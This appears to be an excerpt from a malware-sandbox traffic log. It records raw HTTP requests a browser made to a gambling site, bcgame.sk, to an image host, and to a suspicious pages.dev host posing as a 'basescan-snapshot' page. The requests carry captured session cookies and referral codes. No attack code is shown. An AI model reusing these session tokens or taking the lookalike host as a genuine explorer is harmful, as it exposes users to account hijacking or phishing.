            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/debounce-f7740f4e.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/b0543d5f29.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/e77c37b458.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/8a83305a67.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cache/platform-sports/v14/live10/2103509236163162112/en/ HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /assets/lottery-BgL2Ay0X.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /assets/icon-g-DjQwb4.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /assets/updown-DQe7IPIb.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /game/image/13106_The%20Zeus%20vs%20Hades.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/4f7e7099e6.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/isObject-909534d5.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/90ba079bba.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/8a83305a67.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/fab0e3ca6b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/logo-BjYZztWT.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /assets/banner-DCWqOOaK.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212; .thumbcache_1f3830c3848041ef5612f684078f2210=; smidV2=202409272116535bcb6f81acab744549b59aabcf417ff40005f09dc46274270
            Source: global trafficHTTP traffic detected: GET /game/image/15935_Sugar%20rush%201000.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/fab0e3ca6b.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/toNumber-e58af95e.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/useGoogleLogin-5a174152.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/ca456564-e22a-47f9-ac2d-c70fad6c3534.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/web-170e0195.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/solid-js-bce2a176.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/UnableLogin-924f35fd.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
